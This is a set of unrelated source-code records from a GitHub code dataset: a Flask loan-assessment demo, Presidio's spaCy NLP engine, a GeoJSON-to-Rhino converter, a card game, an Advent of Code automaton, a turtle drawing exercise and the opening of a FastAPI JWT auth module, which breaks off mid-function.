table.add_row(\n \"Dependent projects\", f\"{set(with_dependencies.dependent_projects.keys())}\"\n )\n readme = Path(project.root_path, \"README.md\")\n return (\n table,\n Markdown(readme.read_text(encoding=\"utf-8\")) if readme.exists() else None,\n )\n","repo_name":"Vandebron/mpyl","sub_path":"src/mpyl/cli/commands/projects/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"4003973345","text":"from flask import Flask, render_template, request\r\n\r\napp = Flask(__name__)\r\n\r\n# Mocked balance sheet data for demonstration\r\nbalance_sheet_data = [\r\n {\r\n \"year\": 2022,\r\n \"month\": 12,\r\n \"profitOrLoss\": 15000,\r\n \"assetsValue\": 120000\r\n },\r\n {\r\n \"year\": 2022,\r\n \"month\": 11,\r\n \"profitOrLoss\": 12000,\r\n \"assetsValue\": 130000\r\n },\r\n {\r\n \"year\": 2022,\r\n \"month\": 10,\r\n \"profitOrLoss\": 8000,\r\n \"assetsValue\": 110000\r\n },\r\n {\r\n \"year\": 2022,\r\n \"month\": 9,\r\n \"profitOrLoss\": -5000,\r\n \"assetsValue\": 105000\r\n }\r\n]\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n\r\n data = request.form\r\n\r\n business_name = data.get('businessName', '')\r\n year_established = data.get('yearEstablished', '')\r\n loan_amount = float(data.get('loanAmount', 0))\r\n accounting_provider = data.get('accountingProvider', '')\r\n\r\n last_12_months = balance_sheet_data[:12]\r\n made_profit = any(profit['profitOrLoss'] > 0 for profit in last_12_months) #made profit in 12 months\r\n asset_values = [asset['assetsValue'] for asset in last_12_months] #calculating avrage of asset values\r\n avg_asset_value = sum(asset_values) / len(asset_values)\r\n\r\n if made_profit:\r\n pre_assessment = 60\r\n elif avg_asset_value >= loan_amount:\r\n pre_assessment = 100\r\n else:\r\n pre_assessment = 20\r\n\r\n\r\n loan_application_result = {\r\n 'businessName': business_name,\r\n 'yearEstablished': year_established,\r\n 'preAssessment': pre_assessment,\r\n 'accounting_provider':accounting_provider\r\n }\r\n\r\n return render_template('index.html', result=loan_application_result, show_result=True)\r\n return render_template('index.html', show_result=False)\r\n\r\n\r\nif __name__ 
== '__main__':\r\n app.run(debug=True)\r\n","repo_name":"hema-prema/business_loan_web","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12636611057","text":"from project.apps.nearest_bank_api.domain.emums import ServiceActivityEnum\nfrom project.apps.nearest_bank_api.models import Atm, SalePoint\nfrom project.apps.nearest_bank_api.selectors.atm import atm_get_list\nfrom project.apps.nearest_bank_api.selectors.sale_points import sale_point_get_list\n\n\ndef unified_points_get_queryset() -> list[Atm | SalePoint]:\n # Function to merge the two querysets into a single list\n unified_list = list(sale_point_get_list()) + list(atm_get_list())\n return unified_list\n\n\ndef unified_point_get_active_service_id_list(unified_point: Atm | SalePoint) -> list[int]:\n if isinstance(unified_point, Atm):\n available_services = unified_point.services.filter(\n atmservicethrough__serviceActivity=ServiceActivityEnum.AVAILABLE.value\n )\n elif isinstance(unified_point, SalePoint):\n available_services = unified_point.services.filter(\n salepointservicethrough__serviceActivity=ServiceActivityEnum.AVAILABLE.value\n )\n\n return available_services.values_list('id', flat=True)\n","repo_name":"gt005/vtb_hackathon_5.0","sub_path":"backend/project/apps/nearest_bank_api/selectors/unified_points.py","file_name":"unified_points.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"700091134","text":"import logging\nfrom typing import Optional, Dict, Iterator, Tuple, Union, List\n\nimport spacy\n\nfrom spacy.language import Language\nfrom spacy.tokens import Doc, Span\n\nfrom presidio_analyzer.nlp_engine import NlpArtifacts, NlpEngine, NerModelConfiguration\n\nlogger = logging.getLogger(\"presidio-analyzer\")\n\n\nclass SpacyNlpEngine(NlpEngine):\n \"\"\"\n SpacyNlpEngine is an abstraction layer over the nlp module.\n\n It provides processing functionality as well as other queries\n on tokens.\n The SpacyNlpEngine uses SpaCy as its NLP module\n \"\"\"\n\n engine_name = \"spacy\"\n is_available = bool(spacy)\n\n def __init__(\n self,\n models: Optional[List[Dict[str, str]]] = None,\n ner_model_configuration: Optional[NerModelConfiguration] = None,\n ):\n \"\"\"\n Initialize a wrapper on spaCy functionality.\n\n :param models: Dictionary with the name of the spaCy model per language.\n For example: models = [{\"lang_code\": \"en\", \"model_name\": \"en_core_web_lg\"}]\n :param ner_model_configuration: Parameters for the NER model.\n See conf/spacy.yaml for an example\n \"\"\"\n if not models:\n models = [{\"lang_code\": \"en\", \"model_name\": \"en_core_web_lg\"}]\n self.models = models\n\n if not ner_model_configuration:\n ner_model_configuration = NerModelConfiguration(self.engine_name)\n self.ner_model_configuration = ner_model_configuration\n\n self.nlp = None\n\n def load(self) -> None:\n \"\"\"Load the spaCy NLP model.\"\"\"\n logger.debug(f\"Loading SpaCy models: {self.models}\")\n\n self.nlp = {}\n # Download spaCy model if missing\n for model in self.models:\n self._validate_model_params(model)\n self._download_spacy_model_if_needed(model[\"model_name\"])\n self.nlp[model[\"lang_code\"]] = spacy.load(model[\"model_name\"])\n\n @staticmethod\n def _download_spacy_model_if_needed(model_name: str) -> None:\n if not spacy.util.is_package(model_name):\n logger.warning(f\"Model 
{model_name} is not installed. Downloading...\")\n spacy.cli.download(model_name)\n logger.info(f\"Finished downloading model {model_name}\")\n\n @staticmethod\n def _validate_model_params(model: Dict) -> None:\n if \"lang_code\" not in model:\n raise ValueError(\"lang_code is missing from model configuration\")\n if \"model_name\" not in model:\n raise ValueError(\"model_name is missing from model configuration\")\n if not isinstance(model[\"model_name\"], str):\n raise ValueError(\"model_name must be a string\")\n\n def get_supported_entities(self) -> List[str]:\n \"\"\"Return the supported entities for this NLP engine.\"\"\"\n if not self.ner_model_configuration.model_to_presidio_entity_mapping:\n raise ValueError(\n \"model_to_presidio_entity_mapping is missing from model configuration\"\n )\n return list(\n set(self.ner_model_configuration.model_to_presidio_entity_mapping.values())\n )\n\n def is_loaded(self) -> bool:\n \"\"\"Return True if the model is already loaded.\"\"\"\n return self.nlp is not None\n\n def process_text(self, text: str, language: str) -> NlpArtifacts:\n \"\"\"Execute the SpaCy NLP pipeline on the given text and language.\"\"\"\n if not self.nlp:\n raise ValueError(\"NLP engine is not loaded. Consider calling .load()\")\n\n doc = self.nlp[language](text)\n return self._doc_to_nlp_artifact(doc, language)\n\n def process_batch(\n self,\n texts: Union[List[str], List[Tuple[str, object]]],\n language: str,\n as_tuples: bool = False,\n ) -> Iterator[Optional[NlpArtifacts]]:\n \"\"\"Execute the NLP pipeline on a batch of texts using spacy pipe.\n\n :param texts: A list of texts to process.\n :param language: The language of the texts.\n :param as_tuples: If set to True, inputs should be a sequence of\n (text, context) tuples. Output will then be a sequence of\n (doc, context) tuples. Defaults to False.\n \"\"\"\n\n if not self.nlp:\n raise ValueError(\"NLP engine is not loaded. 
Consider calling .load()\")\n\n texts = (str(text) for text in texts)\n docs = self.nlp[language].pipe(texts, as_tuples=as_tuples)\n for doc in docs:\n yield doc.text, self._doc_to_nlp_artifact(doc, language)\n\n def is_stopword(self, word: str, language: str) -> bool:\n \"\"\"\n Return true if the given word is a stop word.\n\n (within the given language)\n \"\"\"\n return self.nlp[language].vocab[word].is_stop\n\n def is_punct(self, word: str, language: str) -> bool:\n \"\"\"\n Return true if the given word is a punctuation word.\n\n (within the given language).\n \"\"\"\n return self.nlp[language].vocab[word].is_punct\n\n def get_nlp(self, language: str) -> Language:\n \"\"\"\n Return the language model loaded for a language.\n\n :param language: Language\n :return: Model from spaCy\n \"\"\"\n return self.nlp[language]\n\n def _doc_to_nlp_artifact(self, doc: Doc, language: str) -> NlpArtifacts:\n lemmas = [token.lemma_ for token in doc]\n tokens_indices = [token.idx for token in doc]\n\n entities = self._get_entities(doc)\n scores = self._get_scores_for_entities(doc)\n\n entities, scores = self._get_updated_entities(entities, scores)\n\n return NlpArtifacts(\n entities=entities,\n tokens=doc,\n tokens_indices=tokens_indices,\n lemmas=lemmas,\n nlp_engine=self,\n language=language,\n scores=scores,\n )\n\n def _get_entities(self, doc: Doc) -> List[Span]:\n \"\"\"\n Extract entities out of a spaCy pipeline, depending on the type of pipeline.\n\n For normal spaCy, this would be doc.ents\n :param doc: the output spaCy doc.\n :return: List of entities\n \"\"\"\n\n return doc.ents\n\n def _get_scores_for_entities(self, doc: Doc) -> List[float]:\n \"\"\"Extract scores for entities from the doc.\n\n Since spaCy does not provide confidence scores for entities by default,\n we use the default score from the ner model configuration.\n :param doc: SpaCy doc\n \"\"\"\n\n entities = doc.ents\n scores = [self.ner_model_configuration.default_score] * len(entities)\n return scores\n\n def _get_updated_entities(\n self, entities: List[Span], scores: List[float]\n ) -> Tuple[List[Span], List[float]]:\n \"\"\"\n Get an updated list of entities based on the ner model configuration.\n\n Remove entities that are in labels_to_ignore,\n update entity names based on model_to_presidio_entity_mapping\n\n :param entities: Entities that were extracted from a spaCy pipeline\n :param scores: Original confidence scores for the entities extracted\n :return: Tuple holding the entities and confidence scores\n \"\"\"\n if len(entities) != len(scores):\n raise ValueError(\"Entities and scores must be the same length\")\n\n new_entities = []\n new_scores = []\n\n mapping = self.ner_model_configuration.model_to_presidio_entity_mapping\n to_ignore = self.ner_model_configuration.labels_to_ignore\n for ent, score in zip(entities, scores):\n # Remove model labels in the ignore list\n if ent.label_ in to_ignore:\n continue\n\n # Update entity label based on mapping\n if ent.label_ in mapping:\n ent.label_ = mapping[ent.label_]\n else:\n logger.warning(\n f\"Entity {ent.label_} is not mapped to a Presidio entity, \"\n f\"but keeping anyway. 
\"\n f\"Add to `NerModelConfiguration.labels_to_ignore` to remove.\"\n )\n\n # Remove presidio entities in the ignore list\n if ent.label_ in to_ignore:\n continue\n\n new_entities.append(ent)\n\n # Update score if entity is in low score entity names\n if ent.label_ in self.ner_model_configuration.low_score_entity_names:\n score *= self.ner_model_configuration.low_confidence_score_multiplier\n\n new_scores.append(score)\n\n return new_entities, new_scores\n","repo_name":"microsoft/presidio","sub_path":"presidio-analyzer/presidio_analyzer/nlp_engine/spacy_nlp_engine.py","file_name":"spacy_nlp_engine.py","file_ext":"py","file_size_in_byte":8463,"program_lang":"python","lang":"en","doc_type":"code","stars":2530,"dataset":"github-code","pt":"95"} +{"seq_id":"14509391824","text":"\"\"\"\nAllows for the translation of GeoJSON data to Rhino objects\n\nGeoJSON _does_ support 3d, so this can take 3d coordinates for 3d GeoJSONs\n\nThe GeoJSON Format Specification can be found here:\n http://geojson.org/geojson-spec.html\n\nThe RhinoCommon SDK (where all the Rhino.Geometry objects are documented) is\nhere:\n http://www.rhino3d.com/5/rhinocommon/\n\nI have decided to extend the GeoJSON specification by adding support for one\nmore type of geometry that would be really useful in Rhino (and elsewhere),\nthe Mesh. Here is an example of a json Mesh:\n\n {\"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Mesh\",\n \"coordinates\": [\n [3.43, 54.234, 2343.23],\n [...],\n [...],\n ...,\n ]\n \"faces\": [\n [0,3,2],\n [5,32,1],\n ...,\n ]\n }\n \"properties\": {\"prop0\": \"value0\"}\n }\n\n\nExample of Use:\n >>> import GeoJson2Rhino as geoj\n >>> myGeoJson = '''\n{ \"type\": \"FeatureCollection\",\n \"features\": [\n { \"type\": \"Feature\",\n \"geometry\": {\"type\": \"Point\", \"coordinates\": [102.0, 0.5]},\n \"properties\": {\"prop0\": \"value0\"}\n },\n { \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"LineString\",\n \"coordinates\": [\n [102.0, 0.0], [103.0, 1.0], [104.0, 0.0], [105.0, 1.0]\n ]\n },\n \"properties\": {\n \"prop0\": \"value0\",\n \"prop1\": 0.0\n }\n },\n { \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [\n [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0],\n [100.0, 1.0], [100.0, 0.0] ]\n ]\n },\n \"properties\": {\n \"prop0\": \"value0\",\n \"prop1\": {\"this\": \"that\"}\n }\n }\n ]\n }'''\n >>> guidList = geoj.load(myGeoJson) #stores guids of new rhino objects\n\n\"\"\"\n\n# Import standard library modules\nimport json\n\n# Import Rhino modules\nimport Rhino\nfrom Rhino.Geometry import *\nfrom scriptcontext import doc\n\n# import .NET libraries\nimport System\n\n\ndef addRhinoLayer(layerName, layerColor=System.Drawing.Color.Black):\n \"\"\"Creates a Layer in Rhino using a name and optional color. Returns the\n index of the layer requested. 
If the layer\n already exists, the color is updated and no new layer is created.\"\"\"\n docLyrs = doc.Layers\n layerIndex = docLyrs.Find(layerName, True)\n if layerIndex == -1:\n layerIndex = docLyrs.Add(layerName,layerColor)\n else: # it exists\n layer = docLyrs[layerIndex] # so get it\n if layer.Color != layerColor: # if it has a different color\n layer.Color = layerColor # reset the color\n return layerIndex\n\ndef PointToRhinoPoint(coordinates):\n if len(coordinates) > 2:\n z = coordinates[2]\n else:\n z = 0.0\n x, y = coordinates[0], coordinates[1]\n return Point3d(x, y, z)\n\ndef MultiPointToRhinoPoint(coordinates):\n rhPointList = []\n for point in coordinates:\n rhPointList.append(PointToRhinoPoint(point))\n return rhPointList\n\ndef MeshToRhinoMesh(coordinates, faces):\n rhMesh = Mesh()\n for point in coordinates:\n rhPoint = PointToRhinoPoint(point)\n rhMesh.Vertices.Add(rhPoint)\n for face in faces:\n i, j, k = tuple(face)\n mFace = MeshFace(i, j, k)\n rhMesh.Faces.AddFace(mFace)\n rhMesh.Normals.ComputeNormals()\n rhMesh.Compact()\n return rhMesh\n\ndef LineStringToRhinoCurve(coordinates):\n rhPoints = MultiPointToRhinoPoint(coordinates)\n return Curve.CreateControlPointCurve(rhPoints, 1)\n\ndef MultiLineStringToRhinoCurve(coordinates):\n rhCurveList = []\n for lineString in coordinates:\n rhCurveList.append(LineStringToRhinoCurve(lineString))\n return rhCurveList\n\ndef PolygonToRhinoCurve(coordinates):\n # each ring is a separate list of coordinates\n ringList = []\n for ring in coordinates:\n ringList.append(LineStringToRhinoCurve(ring))\n return ringList\n\ndef MultiPolygonToRhinoCurve(coordinates):\n polygonList = []\n for polygon in coordinates:\n polygonList.append(PolygonToRhinoCurve(polygon))\n return polygonList\n\ndef GeometryCollectionToParser(geometries):\n pass # I need to figure this one out still\n\ndef addPoint(rhPoint, objAtt):\n return doc.Objects.AddPoint(rhPoint, objAtt)\n\ndef addPoints(rhPoints, objAtt):\n guidList = []\n for rhPoint in rhPoints:\n guidList.append(doc.Objects.AddPoint(rhPoint, objAtt))\n return guidList\n\ndef addCurve(rhCurve, objAtt):\n return doc.Objects.AddCurve(rhCurve, objAtt)\n\ndef addCurves(rhCurves, objAtt):\n guidList = []\n for curve in rhCurves:\n guidList.append(addCurve(curve, objAtt))\n return guidList\n\ndef addPolygon(ringList, objAtt):\n # for now this just makes curves\n # but maybe it should make TrimmedSrfs\n # or should group the rings\n return addCurves(ringList, objAtt)\n\ndef addPolygons(polygonList, objAtt):\n guidList = []\n for polygon in polygonList:\n # !! 
Extending the guid list !!!\n guidList.extend(addPolygon(polygon, objAtt))\n return guidList\n\ndef addMesh(rhMesh, objAtt):\n return doc.Objects.AddMesh(rhMesh, objAtt)\n\ngeoJsonGeometryMap = {\n 'Point':(PointToRhinoPoint, addPoint),\n 'MultiPoint':(MultiPointToRhinoPoint, addPoints),\n 'LineString':(LineStringToRhinoCurve, addCurve),\n 'MultiLineString':(MultiLineStringToRhinoCurve, addCurves),\n 'Polygon':(PolygonToRhinoCurve, addPolygon),\n 'MultiPolygon':(MultiPolygonToRhinoCurve, addPolygons),\n 'Mesh':(MeshToRhinoMesh, addMesh),\n 'GeometryCollection':(GeometryCollectionToParser),\n }\n\ndef setUserKeys(properties, objAttributes):\n for key in properties:\n objAttributes.SetUserString(key, str(properties[key]))\n return objAttributes\n\ndef jsonToRhinoCommon(jsonFeature):\n # deal with the geometry\n geom = jsonFeature['geometry']\n geomType = geom['type'] # this will return a mappable string\n coordinates = geom['coordinates']\n # if this is a mesh, pass the faces\n if geomType == 'Mesh':\n faces = geom['faces']\n rhFeature = geoJsonGeometryMap[geomType][0](coordinates, faces)\n # translate the coordinates to Rhino.Geometry objects\n else:\n rhFeature = geoJsonGeometryMap[geomType][0](coordinates)\n return rhFeature\n\ndef addJsonFeature(jsonFeature, objAttributes):\n # deal with the properties\n if jsonFeature['properties']:\n objAttributes = setUserKeys(jsonFeature['properties'], objAttributes)\n geomType = jsonFeature['geometry']['type']\n rhFeature = jsonToRhinoCommon(jsonFeature)\n # return the GUID(s) for the feature\n return geoJsonGeometryMap[geomType][1](rhFeature, objAttributes)\n\ndef processGeoJson(parsedGeoJson,\n destinationLayer=None,\n destinationLayerColor=System.Drawing.Color.Black):\n # get the features\n jsonFeatures = parsedGeoJson['features']\n guidResults = []\n # set up object attributes\n for jsonFeature in jsonFeatures: # for each feature\n att = Rhino.DocObjects.ObjectAttributes()\n # setup layer if requested\n if destinationLayer != None:\n att.LayerIndex = addRhinoLayer(destinationLayer,\n destinationLayerColor)\n guidResults.append(addJsonFeature(jsonFeature, att))\n # return all the guids\n return guidResults\n\ndef load(rawJsonData,\n destinationLayer=None,\n destinationLayerColor=System.Drawing.Color.Black):\n # if the data already appears to be a dict literal ...\n if type(rawJsonData) == dict:\n jsonData = rawJsonData\n else: # otherwise, just try to load it\n jsonData = json.loads(rawJsonData)\n # if this is just a GeoJSON ...\n if jsonData[\"type\"] == \"FeatureCollection\":\n # process the GeoJSON, pass the layer and color in\n return processGeoJson(jsonData, destinationLayer,\n destinationLayerColor)\n # or if this is a set of layers from PostSites ...\n elif jsonData[\"type\"] == \"LayerCollection\":\n # make a list for all the guids\n allResults = []\n layersList = jsonData['layers']\n for layer in layersList: # for each layer\n name = layer['name'] # get the name\n if 'color' in layer: # get the color if it exists\n color = layer['color']\n else:\n color = destinationLayerColor # or just make it black\n geoJson = layer['contents'] # get the GeoJSON for this layer\n # make it\n layerResults = processGeoJson( geoJson, name, color )\n allResults.append(layerResults)\n return allResults\n else:\n return \"This doesn't look like correctly formatted GeoJSON data.\\nI'm not sure what to do with it, 
sorry.\"\n\n","repo_name":"localcode/rhinopythonscripts","sub_path":"GeoJson2Rhino.py","file_name":"GeoJson2Rhino.py","file_ext":"py","file_size_in_byte":9121,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"95"} +{"seq_id":"35078358435","text":"from pydantic import Field, BaseModel\nfrom typing import Any\nfrom enum import Enum\n\nfrom .base import CycloneBaseModel\n\n\nclass CredentialsType(int, Enum):\n mailgun = 1\n sendgrid = 2\n\n\nclass Credentials(CycloneBaseModel):\n type: int = Field(\n description=\"The supported mail provider for the application\", example=1\n )\n values: dict[str, Any] | None = Field(\n description=\"Relevant configuration values for the mail provider\",\n example={\n \"client_id\": \"xsf-440dkdd-djdj\",\n \"client_secret\": \"kdkdk-40djdkd-dkdkd\",\n },\n )\n\n\nclass CredentialsUpdate(BaseModel):\n type: CredentialsType | None = Field(\n default=None,\n description=\"The supported mail provider for the application\",\n example=\"mailgun\",\n )\n values: dict[str, Any] | None = Field(\n default=None,\n description=\"Relevant configuration values for the mail provider\",\n example={\n \"client_id\": \"xsf-440dkdd-djdj\",\n \"client_secret\": \"kdkdk-40djdkd-dkdkd\",\n },\n )\n","repo_name":"bayitt/cyclone","sub_path":"cyclone/schemas/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5969273948","text":"from dealer import Dealer\r\nfrom trick import Trick\r\nfrom players import Player\r\nimport os\r\nfrom utils import gap\r\nfrom display import PlayerDisplay\r\nclass Game:\r\n def __init__(self, player: Player) -> None:\r\n self.player = player\r\n self.dealer=Dealer()\r\n self.tricks=[]\r\n self.show_card=False\r\n self.score=[0 for i in range(4)]\r\n\r\n\r\n\r\n def start(self):\r\n os.system('clear')\r\n\r\n player=self.player.get_player_name()\r\n print(f\"Player 1: {player} \")\r\n\r\n dealed_cards = self.dealer.getCards()\r\n\r\n \"\"\" 3. Play Cards \"\"\"\r\n # TODO will move to server interface for client communicaiton\r\n # should we instantiate it here or in another factory ??\r\n # we can refactor this with new method or transferring to Trick Class\r\n trick_starter=0\r\n\r\n for i in range(13):\r\n\r\n trick=Trick()\r\n\r\n\r\n for player in range(trick_starter, 4+trick_starter):\r\n player=player%4\r\n player_hand=dealed_cards[player]\r\n player_hand_cards = player_hand.get_hand_cards()\r\n\r\n player_display = PlayerDisplay()\r\n player_display.set_trick(trick=trick)\r\n player_display.display(player=player, cards = player_hand_cards)\r\n\r\n card_number=int(input(\"Play a Card:\" ))\r\n\r\n # TODO optimize korte hobe\r\n while trick.get_basesuit() != player_hand_cards[card_number-1].suit and trick.get_basesuit() != None and player_hand.has_basesuit(trick.get_basesuit()):\r\n player_display.set_massage(f\"Base Suit: {trick.get_basesuit()}\")\r\n player_display.set_massage(f\"You Played: {player_hand_cards[card_number-1]}\")\r\n player_display.display(player,player_hand_cards)\r\n\r\n card_number=int(input(\"Play a Card With Same Suit:\" ))\r\n\r\n trick.play(player_hand_cards[card_number-1],player)\r\n player_hand_cards.remove(player_hand_cards[card_number-1])\r\n # player_display.set_trick(trick=trick)\r\n os.system('clear')\r\n\r\n\r\n player_display.set_trick(trick=trick)\r\n self.display_scoreboard()\r\n trick.display_trick_state()\r\n\r\n \"\"\"# ! 
------- section -------\r\n\r\n # ! Player One\r\n\r\n\r\n trick.display_trick_state()\r\n self.display_cards(cards)\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n os.system('clear')\r\n trick.display_trick_state()\r\n\r\n # ! Player two\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n trick.display_trick_state()\r\n\r\n # ! Player three\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n trick.display_trick_state()\r\n\r\n # ! Player four\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n trick.display_trick_state()\r\n\r\n # ! ------- end section -------\"\"\"\r\n\r\n \"\"\"4. Display Winner Of the Trick\"\"\"\r\n self.tricks.append(trick)\r\n trick.display_winner()\r\n trick_starter= trick.get_winner_player()\r\n self.score[trick_starter]+=1\r\n input(\"\\n\\nPress enter to continue...\")\r\n os.system('clear')\r\n self.display_scoreboard()\r\n\r\n ## 5. Play Next Card till last card\r\n def display_cards(self, cards : list):\r\n hand= \"\\t\".join(f\"{card}\" for card in cards)\r\n serial=\"\\t\\t\".join(f\"{i}\" for i in range(1,len(cards)+1))\r\n print(f\"{hand}\\n{serial}\")\r\n\r\n gap(4)\r\n\r\n def display_all_players_card(self,dealed_cards):\r\n if self.show_card:\r\n for i in range(4):\r\n print(f\"\\t Player {i+1} \\t: \\tCards\")\r\n self.display_cards(dealed_cards[i])\r\n print(\"\\n\\n\")\r\n\r\n\r\n def display_scoreboard(self):\r\n print(\"SCORECARD: \")\r\n if self.tricks:\r\n for trick in self.tricks:\r\n trick.display_winner()\r\n gap(1)\r\n\r\n if len(self.tricks)==13:\r\n self.display_player_stat()\r\n self.display_game_winner()\r\n\r\n def game_winner(self):\r\n max_win=max(self.score)\r\n return self.score.index(max_win) +1\r\n\r\n def display_game_winner(self):\r\n print(f\"\\t\\t\\tPlayer {self.game_winner()} Won !!!! 
\")\r\n\r\n def display_player_stat(self):\r\n for i in range(4):\r\n print(f\"Player {i+1} --> {self.score[i]}\")\r\n\r\n\r\n","repo_name":"redwanratu/DeckOfCarsV2","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15714011454","text":"from functools import reduce\nfrom sys import stdin\nimport math\n\ndef get_stdin():\n return [line.rstrip() for line in stdin]\n\nlines = get_stdin()\nsteps = 6\n\n# saves time on part 2 vs iterating over full cube from round 1\ndef extendminimamaxima(bounds, x,y,z,w):\n if x < bounds[0][0]:\n bounds[0][0] = x\n if y < bounds[0][1]:\n bounds[0][1] = y\n if z < bounds[0][2]:\n bounds[0][2] = z\n if w < bounds[0][3]:\n bounds[0][3] = w\n if x > bounds[1][0]:\n bounds[1][0] = x\n if y > bounds[1][1]:\n bounds[1][1] = y\n if z > bounds[1][2]:\n bounds[1][2] = z\n if w > bounds[1][3]:\n bounds[1][3] = w\n return bounds\n\ndef isactive(grid, x, y, z, w):\n a = grid.get((x,y,z,w))\n return a is not None\n\ndef setactive(grid, bounds,x,y,z,w):\n grid[(x,y,z,w)] = True\n return extendminimamaxima(bounds, x,y,z,w)\n\ndef setinactive(grid, x,y,z,w):\n grid.popitem((x,y,z,w))\n\ndef activeneighbours3d(grid, x,y,z,w):\n activecount = 0\n for x1 in [x-1, x, x+1]:\n for y1 in [y-1, y, y+1]:\n for z1 in [z-1, z, z+1]:\n if x1 != x or y1 != y or z1 != z:\n if isactive(grid,x1,y1,z1,0):\n activecount += 1\n return activecount\n\ndef nextgrid3d(grid, bounds):\n nextgrid = {}\n for x in range(bounds[0][0]-1, bounds[1][0]+2):\n for y in range(bounds[0][1]-1, bounds[1][1]+2):\n for z in range(bounds[0][2]-1, bounds[1][2]+2):\n neighbours = activeneighbours4d(grid, x, y, z, 0)\n currentlyactive = isactive(grid,x,y,z,0)\n #print(\"state\",x,y,z,currentlyactive,neighbours)\n if currentlyactive and neighbours in [2,3]:\n bounds = setactive(nextgrid,bounds,x,y,z,0)\n elif not currentlyactive and neighbours == 3:\n bounds = setactive(nextgrid,bounds,x,y,z,0)\n return nextgrid, bounds\n\ndef activeneighbours4d(grid, x,y,z,w):\n activecount = 0\n for x1 in [x-1, x, x+1]:\n for y1 in [y-1, y, y+1]:\n for z1 in [z-1, z, z+1]:\n for w1 in [w-1, w, w+1]:\n if x1 != x or y1 != y or z1 != z or w1 != w:\n if isactive(grid,x1,y1,z1,w1):\n activecount += 1\n return activecount\n\ndef nextgrid4d(grid, bounds):\n nextgrid = {}\n for x in range(bounds[0][0]-1, bounds[1][0]+2):\n for y in range(bounds[0][1]-1, bounds[1][1]+2):\n for z in range(bounds[0][2]-1, bounds[1][2]+2):\n for w in range(bounds[0][3]-1, bounds[1][3]+2):\n neighbours = activeneighbours4d(grid, x, y, z, w)\n currentlyactive = isactive(grid,x,y,z,w)\n #print(\"state\",x,y,z,currentlyactive,neighbours)\n if currentlyactive and neighbours in [2,3]:\n bounds = setactive(nextgrid,bounds,x,y,z,w)\n elif not currentlyactive and neighbours == 3:\n bounds = setactive(nextgrid,bounds,x,y,z,w)\n return nextgrid, bounds\n\ndef parseInput(lines):\n bignum = 2000000000\n minima = [bignum, bignum, bignum, bignum]\n maxima = [-bignum, -bignum, -bignum, -bignum]\n bbox = [minima, maxima]\n grid = {}\n for y in range(len(lines)):\n for x in range(len(lines[0])):\n if lines[y][x] == \"#\":\n bbox = setactive(grid, bbox, x, y, 0, 0)\n return grid, bbox\n\ndef part1(lines):\n startgrid, bbox = parseInput(lines)\n stepgrid = startgrid.copy()\n for i in range(0,steps):\n stepgrid, bbox = nextgrid3d(stepgrid, bbox)\n print(len(stepgrid))\n\ndef part2(lines):\n startgrid, bbox = parseInput(lines)\n stepgrid = 
+{"seq_id":"29175002797","text":"#18. (challenge) In old games you could see that the drawings were made up of many triangles. As a way to practice this, given an N from the user, draw a polygon with N sides composed only of triangles, as in the figure:\n\nimport turtle\nimport math\n\ndef poligono(n):\n \n if n < 3:\n \n print('N must be greater than or equal to 3')\n \n else:\n \n turtle.speed('fastest')\n \n angulo_central = (360/n)\n angulo_b = (180-angulo_central)/2\n angulo_c = (180-angulo_central)/2\n \n lado2 = 100\n lado3 = 100\n \n lado1 = (lado2**2 + lado3**2 -2*(lado2*lado3*math.cos(math.radians(angulo_central))))**(1/2)\n print(lado1)\n \n for i in range(0,n):\n \n turtle.forward(lado1)\n turtle.left(180 - angulo_c)\n turtle.forward(lado2)\n turtle.left(180 - angulo_central)\n turtle.forward(lado3)\n turtle.left(180 - angulo_b)\n turtle.forward(lado1)\n turtle.left(angulo_central)\n \n\nn = int(input('Enter the value of n '))\n \npoligono(n)","repo_name":"lucaslb767/pythonInfnet","sub_path":"fundamentosPython/TP1/questao18.py","file_name":"questao18.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"33854327835","text":"from src.models import Users\nfrom fastapi import status\nfrom fastapi import Depends\nfrom fastapi.exceptions import HTTPException\n\nfrom fastapi.security import OAuth2PasswordBearer\n\nfrom jose import JWTError\nfrom jose import jwt\n\nfrom datetime import (\n datetime,\n timedelta\n)\n\nfrom src.config import (\n auth_config,\n api_config\n)\n\n\nSECRET = auth_config.jwt_secret\nALGORITHM = auth_config.jwt_alg\nACCESS_TOKEN_EXPIRE_MINUTES = auth_config.jwt_exp\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=f'{api_config.api_version_path}/auth/sign_in')\n\n\ndef create_access_token(data: dict):\n to_encode = data.copy()\n expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)\n to_encode.update({\"exp\": expire})\n encoded_jwt = jwt.encode(to_encode, SECRET, algorithm=ALGORITHM)\n return encoded_jwt\n\n\ndef verify_access_token(token: str, credentials_exception):\n try:\n payload = jwt.decode(token, SECRET, algorithms=[ALGORITHM])\n 